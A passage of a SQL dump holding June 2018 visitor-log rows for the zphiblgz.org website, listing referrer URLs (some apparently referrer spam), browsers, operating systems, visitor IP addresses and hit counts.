9,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.108','000',2,0),(31270,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.99','000',2,0),(31271,'2018-06-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.113','000',2,0),(31272,'2018-06-03','https://zphiblgz.org','Firefox','Windows','40.1','','106.193.233.51','000',2,0),(31273,'2018-06-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(31274,'2018-06-04','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.144','000',2,0),(31275,'2018-06-04','https://www.atyks.ru/','MSIE','Windows','6.0','','134.249.52.34','000',3,0),(31276,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.222','000',2,0),(31277,'2018-06-04','https://odiabetikah.com/','MSIE','Windows','6.0','','109.162.66.73','000',2,0),(31278,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','110.83.60.89','000',2,0),(31279,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','218.66.74.152','000',2,0),(31280,'2018-06-04','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(31281,'2018-06-04','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.189.142','000',1,0),(31282,'2018-06-04','zphiblgz.org','Chrome','Windows','58.0.1145.75','','87.98.227.4','000',1,0),(31283,'2018-06-04','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(31284,'2018-06-04','https://spb-plitka.ru/','MSIE','Unknown','7.0b','','134.249.52.34','000',3,0),(31285,'2018-06-04','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',26,0),(31286,'2018-06-04','https://zphiblgz.org','Firefox','Linux','42.0','','185.198.164.174','000',2,0),(31287,'2018-06-04','https://zphiblgz.org','Firefox','Windows','40.1','','180.191.119.66','000',2,0),(31288,'2018-06-04','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','5.9.145.132','000',1,0),(31289,'2018-06-04','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(31290,'2018-06-04','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(31291,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.227.68.112','000',4,0),(31292,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.36.129','000',4,0),(31293,'2018-06-04','https://yhirurga.ru/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31294,'2018-06-04','https://documentserver.net/','MSIE','Windows','6.0','','134.249.54.27','000',1,0),(31295,'2018-06-04','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(31296,'2018-06-04','https://zphiblgz.org','Firefox','Windows','40.1','','197.156.95.150','000',2,0),(31297,'2018-06-04','https://zphiblgz.org','Firefox','Windows','40.1','','24.135.122.103','000',2,0),(31298,'2018-06-04','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','164.159.59.2','000',4,0),(31299,'2018-06-04','https://r.search.yahoo.com/_ylt=A9FJtr4FYBVbLWMAE0kPxQt.;_ylu=X3oDMTByNXQ0NThjBGNvbG8DYmYxBHBvcwM1BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1528156293/RO=10/RU=https%3a%2f%2fzphiblgz.org%2fscholarship%2f/RK=2/RS=PBaZQpe8aerycY88pClY9JPhAoc-','Safari','Macintosh','11.0.3','','73.180.159.11','000',4,0),(31300,'2018-06-04','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(31301,'2018-06-04','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(31302,'2018-06-04','zphiblgz.org','Chrome','Windows','46.0.2754.75','','173.203.70.234','000',1,0),(31303,'2018-06-04','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(31304,'2018-06-04','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.231.84.55','000',2,0),(31305,'2018-06-04','https://zphiblgz.org','MailChimp','Unknown','Unknown','','35.237.159.18','000',2,0),(31306,'2018-06-04','https://www.bing.com/','MSIE','Windows','11.0','','38.100.152.82','000',3,0),(31307,'2018-06-04','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1809.i2j7fw9QFltgQyRVBxItXm8X6K82gVoSCfHeclTuh73UDmic-x9bdpSyu9y6wXGi.8e785868c755bbc3e74108f07142cccc149c065a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVWRiRDl4Tjh2blBXTU8zRGpEZUJuU1pTbUZvQmVVbS10TzM0ejhQMUFTZFE1OHpteEV4VkE5QQ&b64e=2&sign=2b86064518f6fb8fd9215967a219e55a&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTT7-FgkZ9JKY3cmY3h_F4L24l645Ohps3yBSVnO6JvWIa418uNy2NLJYpe2zJAGyIKtK4ghDbf-d2kdEeUM5yVwjCedLUMMRftO7DjIXKVsaBXQsvK4VzcCn5vgUnjMj_7&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUrYE_V40103hrZoFggC0otyiUeUxOBtV-6UPfztqiamcZ3tx3AQY1khDtHXoZjiXYY67LdvSko6w&l10n=ru&cts=1528137559750&mc=6.39411910812','Opera','Windows','12.17','','77.37.161.253','000',2,0),(31308,'2018-06-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(31309,'2018-06-04','https://zphiblgz.org','Firefox','Windows','57.0','','91.247.38.43','000',2,0),(31310,'2018-06-04','https://zphiblgz.org','Opera','Windows','11.10','','31.184.192.185','000',2,0),(31311,'2018-06-04','https://zphiblgz.org','Go--client','Unknown','1.1','','173.212.228.153','000',1,0),(31312,'2018-06-04','http://zphiblgz.org','Go--client','Unknown','2.0','','173.212.228.153','000',1,0),(31313,'2018-06-04','http://elvel.com.ua/','MSIE','Windows','6.0','','178.137.163.137','000',6,0),(31314,'2018-06-04','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.181','','162.17.211.113','000',7,0),(31315,'2018-06-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(31316,'2018-06-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.120.249','000',2,0),(31317,'2018-06-04','http://zphiblgz.org/','Safari','Linux','534.34','','35.196.120.249','000',1,0),(31318,'2018-06-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(31319,'2018-06-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(31320,'2018-06-04','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','98.218.184.197','000',1,0),(31321,'2018-06-04','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.88.76','000',1,0),(31322,'2018-06-05','https://www.google.com/','Chrome','Android','66.0.3359.158','','172.56.2.46','000',2,0),(31323,'2018-06-05','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',1,0),(31324,'2018-06-05','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','5.9.106.81','000',1,0),(31325,'2018-06-05','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.153','000',2,0),(31326,'2018-06-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.139.192','000',2,0),(31327,'2018-06-05','https://zphiblgz.org','Safari','iPhone','5.0.2','','35.231.139.192','000',3,0),(31328,'2018-06-05','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','46.20.35.114','000',6,0),(31329,'2018-06-05','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.129.203','000',3,0),(31330,'2018-06-05','https://ogorodnic.com/','MSIE','Windows','6.0','','178.137.163.137','000',2,0),(31331,'2018-06-05','https://ofermerah.com/','MSIE','Windows','6.0','','134.249.52.34','000',2,0),(31332,'2018-06-05','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.129','000',1,0),(31333,'2018-06-05','zphiblgz.org','Opera','Windows','8.50','','104.168.145.69','000',2,0),(31334,'2018-06-05','https://zphiblgz.org','Firefox','Windows','40.1','','192.207.206.130','000',2,0),(31335,'2018-06-05','https://zphiblgz.org/','Firefox','Windows','57.0','','31.207.3.223','000',1,0),(31336,'2018-06-05','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.107','000',1,0),(31337,'2018-06-05','https://luckybull.io/','MSIE','Windows','6.0','','134.249.54.27','000',3,0),(31338,'2018-06-05','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(31339,'2018-06-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(31340,'2018-06-05','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(31341,'2018-06-05','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.35.135','000',4,0),(31342,'2018-06-05','https://ofermerah.com/','MSIE','Windows','6.0','','109.162.66.73','000',2,0),(31343,'2018-06-05','https://zphiblgz.org','Firefox','Windows','3.0','','74.201.38.18','000',1,0),(31344,'2018-06-05','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.105','000',1,0),(31345,'2018-06-05','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(31346,'2018-06-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',17,0),(31347,'2018-06-05','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(31348,'2018-06-05','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(31349,'2018-06-05','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(31350,'2018-06-05','https://odiabetikah.com/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31351,'2018-06-05','https://zphiblgz.org','Safari','Macintosh','11.1','','71.179.81.192','000',7,0),(31352,'2018-06-05','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(31353,'2018-06-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31354,'2018-06-05','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(31355,'2018-06-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(31356,'2018-06-05','https://yhirurga.ru/','MSIE','Windows','4.01','','109.162.66.73','000',1,0),(31357,'2018-06-05','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(31358,'2018-06-05','https://zphiblgz.org','Firefox','Macintosh','59.0','','64.246.165.150','000',2,0),(31359,'2018-06-05','https://zphiblgz.org','MSIE','Windows','11.0','','88.198.43.207','000',1,0),(31360,'2018-06-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(31361,'2018-06-05','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATOqbPBbgpIY8b7oNY1vJ1L40SV4-zb4QfCL05t9D_ZgLcU1hMK85mgzyMZpvJMVE5bHIyyvw--2s21YZPmSlOQDUgoL0FrBidLRJ3lCi0uST4YXXFE4Ood_ALPBLQ','Chrome','Windows','40.0.2214.85','','173.252.92.213','000',2,0),(31362,'2018-06-05','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATOqbPBbgpIY8b7oNY1vJ1L40SV4-zb4QfCL05t9D_ZgLcU1hMK85mgzyMZpvJMVE5bHIyyvw--2s21YZPmSlOQDUgoL0FrBidLRJ3lCi0uST4YXXFE4Ood_ALPBLQ','Chrome','Windows','40.0.2214.85','','173.252.92.210','000',1,0),(31363,'2018-06-06','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(31364,'2018-06-06','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(31365,'2018-06-06','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(31366,'2018-06-06','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.14','000',2,0),(31367,'2018-06-06','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(31368,'2018-06-06','https://zphiblgz.org','Python-urllib','Unknown','3.5','','198.148.79.6','000',2,0),(31369,'2018-06-06','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(31370,'2018-06-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.181','','104.129.194.86','000',3,0),(31371,'2018-06-06','https://zphiblgz.org','Firefox','Windows','51.0','','95.179.128.185','000',1,0),(31372,'2018-06-06','https://zphiblgz.org','Chrome','Linux','56.0.2924.87','','95.179.128.185','000',1,0),(31373,'2018-06-06','https://zphiblgz.org','Chrome','Windows','55.0.2883.87','','95.179.128.185','000',1,0),(31374,'2018-06-06','https://zphiblgz.org','Edge','Windows','14.14393','','95.179.128.185','000',1,0),(31375,'2018-06-06','http://t-rec.su/','MSIE','Windows','6.0','','178.137.163.137','000',9,0),(31376,'2018-06-06','https://zphiblgz.org/service/youth/','AppleWebKit','Windows','534','','199.30.25.180','000',1,0),(31377,'2018-06-06','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(31378,'2018-06-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(31379,'2018-06-06','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(31380,'2018-06-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(31381,'2018-06-06','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.144','000',1,0),(31382,'2018-06-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(31383,'2018-06-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31384,'2018-06-06','https://zphiblgz.org','Firefox','Windows','40.1','','190.88.149.237','000',2,0),(31385,'2018-06-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(31386,'2018-06-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.235.167','000',1,0),(31387,'2018-06-06','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(31388,'2018-06-06','https://zphiblgz.org','Opera','Windows','11.10','','31.184.192.185','000',2,0),(31389,'2018-06-06','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(31390,'2018-06-06','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(31391,'2018-06-06','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(31392,'2018-06-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.35','000',1,0),(31393,'2018-06-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(31394,'2018-06-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','62.210.37.82','000',2,0),(31395,'2018-06-06','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(31396,'2018-06-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(31397,'2018-06-06','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(31398,'2018-06-06','https://zphiblgz.org','Firefox','Windows','54.0','','96.234.210.118','000',1,0),(31399,'2018-06-06','https://www.google.com/','Chrome','Macintosh','66.0.3359.117','','24.42.147.118','000',2,0),(31400,'2018-06-06','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(31401,'2018-06-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(31402,'2018-06-06','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(31403,'2018-06-06','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.35','000',1,0),(31404,'2018-06-06','https://zphiblgz.org','Firefox','Windows','40.1','','77.127.58.96','000',2,0),(31405,'2018-06-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','5.199.130.127','000',2,0),(31406,'2018-06-06','http://zphiblgz.org/cause/scholarship/','Safari','iPhone','7.0','','40.77.189.121','000',1,0),(31407,'2018-06-06','https://www.google.com/','Safari','iPad','11.0','','68.134.10.25','000',12,0),(31408,'2018-06-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','85.248.227.164','000',1,0),(31409,'2018-06-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','173.254.216.66','000',1,0),(31410,'2018-06-06','http://www.stavimdveri.ru/sitemap.html','MSIE','Windows','6.0','','134.249.52.34','000',2,0),(31411,'2018-06-07','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',9,0),(31412,'2018-06-07','https://ofermerah.com/','MSIE','Windows','6.0','','134.249.52.34','000',4,0),(31413,'2018-06-07','http://zphiblgz.org/','Opera Next','Windows','40.6.1459.7721','','31.28.161.27','000',2,0),(31414,'2018-06-07','https://zphiblgz.org','Firefox','Windows','40.1','','103.66.79.117','000',2,0),(31415,'2018-06-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.107.105','000',2,0),(31416,'2018-06-07','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(31417,'2018-06-07','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',3,0),(31418,'2018-06-07','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(31419,'2018-06-07','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',2,0),(31420,'2018-06-07','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(31421,'2018-06-07','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31422,'2018-06-07','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','64.233.172.168','000',1,0),(31423,'2018-06-07','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.8.42','000',1,0),(31424,'2018-06-07','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','34.212.85.255','000',2,0),(31425,'2018-06-07','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(31426,'2018-06-07','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','185.234.217.244','000',1,0),(31427,'2018-06-07','https://zphiblgz.org','Firefox','Windows','40.1','','160.226.234.47','000',2,0),(31428,'2018-06-07','http://pizza-imperia.com/','Chrome','Linux','37.0.2062.120','','5.189.188.111','000',1,0),(31429,'2018-06-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(31430,'2018-06-07','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(31431,'2018-06-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(31432,'2018-06-07','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.185','000',1,0),(31433,'2018-06-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(31434,'2018-06-07','https://zphiblgz.org','rg','Unknown','Unknown','','185.35.63.166','000',1,0),(31435,'2018-06-07','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.150.246','000',2,0),(31436,'2018-06-07','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(31437,'2018-06-07','https://www.google.com/','Edge','Windows','17.17134','','68.198.1.254','000',2,0),(31438,'2018-06-07','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(31439,'2018-06-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.129','000',2,0),(31440,'2018-06-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1812.9Ku4ayAd7GGJzSm4akkSsjz996YAgbPmQh0Z3DNL7bXMpEQzTykVFOq3O16TZuxn.dfcbef17c12ba352b0e8be76473ecce348390a28&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxYZ2xsMVE0RVN0Y3pVYlEyemF2QU5NbDB6QjBFOUh3U0tjX3dHb3g4TldNSFBtUXlPdkZzR2xCNTE2alYxdTl3RV9ybV9PZVZjR24&b64e=2&sign=6940d4f05f510c14e5676be471ad5b57&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbaCgx8n2A0j21TpRE8R6_3LAvlStQ_kw6UDVzImQSn5Ias5G41X7G-hrSU22cRvxpm4UWQ_Qz0hAnw0fe3Vyl0x-qlcZTfzSXmaCKuOBonL12DsEbUCGiRgpD0z8fiOn1S&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXt84gHdAwCvO6-cTPsA7RxyPHiGc8vgmrb3kxO4imGXOaMAA2s02xybbtMq0_r4chckVGq3HYXBg&l10n=ru&cts=1528411071993&mc=5.91211481409','Chrome','Windows','65.0.3325.162','','5.228.33.61','000',2,0),(31441,'2018-06-07','zphiblgz.org','Chrome','Windows','46.0.2754.75','','5.135.138.188','000',1,0),(31442,'2018-06-07','https://zphiblgz.org','Firefox','Windows','40.1','','218.212.112.171','000',2,0),(31443,'2018-06-07','https://zphiblgz.org','Safari','Linux','534.34','','124.66.185.97','000',1,0),(31444,'2018-06-07','http://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','7.0','','124.66.185.97','000',2,0),(31445,'2018-06-07','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',2,0),(31446,'2018-06-07','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','67.0.3396.79','','69.243.123.183','000',7,0),(31447,'2018-06-07','https://vzubkah.com/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31448,'2018-06-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(31449,'2018-06-07','https://zphiblgz.org','MSIE','Windows','6.0','','109.86.72.27','000',2,0),(31450,'2018-06-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(31451,'2018-06-08','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.7.55','000',12,0),(31452,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.7.55','000',1,0),(31453,'2018-06-08','https://brillianty.info/','MSIE','Windows','5.5','','178.137.163.137','000',1,0),(31454,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(31455,'2018-06-08','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.184','000',1,0),(31456,'2018-06-08','https://slomm.ru/','MSIE','Windows','6.0','','178.137.163.137','000',3,0),(31457,'2018-06-08','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.32','000',2,0),(31458,'2018-06-08','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(31459,'2018-06-08','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(31460,'2018-06-08','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.71.220','000',3,0),(31461,'2018-06-08','https://zphiblgz.org','Firefox','Windows','40.1','','89.217.123.195','000',2,0),(31462,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(31463,'2018-06-08','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(31464,'2018-06-08','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(31465,'2018-06-08','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.34','000',3,0),(31466,'2018-06-08','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(31467,'2018-06-08','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(31468,'2018-06-08','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(31469,'2018-06-08','http://avtovykup.kz/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31470,'2018-06-08','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(31471,'2018-06-08','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(31472,'2018-06-08','https://www.google.com/','Firefox','Macintosh','60.0','','68.203.163.164','000',1,0),(31473,'2018-06-08','https://www.google.com/','Chrome','Chrome OS','66.0.3359.203','','174.236.147.11','000',1,0),(31474,'2018-06-08','https://zphiblgz.org','M','Unknown','Unknown','','207.182.140.210','000',2,0),(31475,'2018-06-08','https://zphiblgz.org','MSIE','Windows','6.0','','23.254.215.245','000',2,0),(31476,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','49.51.168.80','000',2,0),(31477,'2018-06-08','http://www.google.com','Chrome','Windows','15.0.874.121','','104.168.144.21','000',2,0),(31478,'2018-06-08','https://search.yahoo.com/','Chrome','Windows','67.0.3396.79','','24.178.125.142','000',2,0),(31479,'2018-06-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(31480,'2018-06-08','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','51.15.64.212','000',1,0),(31481,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.200.243','000',4,0),(31482,'2018-06-08','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.37','000',1,0),(31483,'2018-06-08','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','40.77.177.49','000',1,0),(31484,'2018-06-08','https://zphiblgz.org','Firefox','Windows','40.1','','197.200.232.102','000',2,0),(31485,'2018-06-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(31486,'2018-06-08','https://www.google.com/','Chrome','Windows','66.0.3359.181','','74.254.43.162','000',2,0),(31487,'2018-06-08','http://zphiblgz.org/','Firefox','Windows','27.0','','193.169.252.17','000',3,0),(31488,'2018-06-08','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.189.39','000',2,0),(31489,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.201','000',2,0),(31490,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.173','000',2,0),(31491,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.234.85','000',2,0),(31492,'2018-06-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.106.146.167','000',2,0),(31493,'2018-06-08','https://zphiblgz.org','Firefox','Macintosh','49.0','','23.94.47.126','000',1,0),(31494,'2018-06-08','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(31495,'2018-06-08','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(31496,'2018-06-08','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(31497,'2018-06-08','https://www.bing.com/','Chrome','Windows','67.0.3396.79','','162.199.16.19','000',4,0),(31498,'2018-06-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','188.240.208.26','000',2,0),(31499,'2018-06-08','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.166.139','000',1,0),(31500,'2018-06-08','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(31501,'2018-06-08','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.20.103.242','000',1,0),(31502,'2018-06-08','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','198.20.103.244','000',1,0),(31503,'2018-06-09','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',13,0),(31504,'2018-06-09','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.132','000',1,0),(31505,'2018-06-09','https://zphiblgz.org','Firefox','Windows','40.1','','182.64.73.42','000',2,0),(31506,'2018-06-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',2,0),(31507,'2018-06-09','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.35','000',1,0),(31508,'2018-06-09','https://documentserver.net/','Opera','Windows','8.01','','134.249.54.27','000',1,0),(31509,'2018-06-09','http://hundejo.com/','Chrome','Linux','37.0.2062.120','','213.61.215.54','000',1,0),(31510,'2018-06-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.35','000',1,0),(31511,'2018-06-09','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,